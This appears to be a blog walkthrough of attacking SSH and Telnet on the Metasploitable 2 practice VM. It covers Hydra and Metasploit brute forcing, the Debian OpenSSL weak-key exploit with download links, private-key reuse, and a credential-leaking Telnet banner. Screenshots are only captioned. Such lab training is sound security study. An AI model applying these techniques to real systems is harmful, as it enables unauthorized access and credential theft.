Metasploitable 2 Walkthrough: Part II

Exploiting Port 22 – SSH

First, a reminder of the information Nmap returned about the SSH service after a port scan:

Port 22 in port scan

The first challenge, when cracking SSH credentials via brute force, is to find usernames. There are two methods to do this:

  • Guess usernames from services
  • Obtain usernames from a file on the machine

It would be great if you could log in via SSH as root, but this is usually disabled. To be successful, you will need a list of users on the system. This can be obtained in many ways, but two methods using SQL servers are covered ahead when talking about MySQL and Postgres. Both chapters cover techniques for obtaining usernames or the /etc/passwd contents with Metasploit.

Once you have the usernames, you can try and crack the passwords.

  • For password wordlists, use the ones provided with Kali or use SecLists from Daniel Miessler on Github: https://github.com/danielmiessler/SecLists
  • If you have usernames only, use Hydra to brute-force credentials
  • If you have usernames and password hashes, use John the Ripper to brute-force credentials

Brute forcing SSH using Hydra

Once you have a list of credentials, you can use Hydra as you did for the FTP service:

Brute force password with Hydra

Brute forcing SSH using Metasploit

Metasploit has an auxiliary module that will test SSH credentials on a range of machines and report successful logins. If you have connected to a database, this module will record successful logins and hosts so you can track your access.

Besides, each successful login will immediately open a session on the remote machine. Then, this session can possibly be upgraded to a Meterpreter session.

Brute forcing and getting a shell with MSF

And that command shell session was upgraded to a more powerful Meterpreter session!

Brute forcing SSH using the RSA method

The OpenSSL package installed on the system is vulnerable to a brute force exploit due to a random number generator weakness (CVE 2008-0166). Searching ExploitDB you will find several exploits for this vulnerability.

Try using the one available at: http://www.exploit-db.com/exploits/5632/.

You can consult the source for more information, but basically the exploit checks if the root account has a weak SSH key, testing each key in the directory where you placed the keys. Upon a hit, you will see something like this:

Before running it, you have to download the precalculated vulnerable keys from:

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

Extract the keys to a temp folder and download also the exploit script.

Now run the script and it will find a key after a while.

Testing RSA keys

Then use that key to log in as root via SSH:

SSH root login

Brute forcing SSH using the Pubkey Method

If you manage to get your hands on the victim's private key, you can use the Metasploit ssh_login_pubkey auxiliary module! This module uses the private key to do two things:

  • Get access to the victim machine
  • Get access to any machines that trust the victim's private key (must be listed in the SSH files of the victim machine)

The remote private key can be obtained in many ways, and you already saw one of them. Just make sure you have the private key properly saved in a text file.

Exploiting a public key with MSF

Success!

Exploiting Port 23 – Telnet

Telnet is a program used to establish a connection between two computers. It is inherently insecure because it transmits data in clear text.

Banner flaw

On the Kali box, open a terminal and telnet to the Metasploitable VM. The banner will display the credentials.

Telnet banner flaw

Exploiting Telnet with Metasploit

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. The same password and user file from earlier will be used for this.

Brute force Telnet with MSF

And you will have another session.

No comments: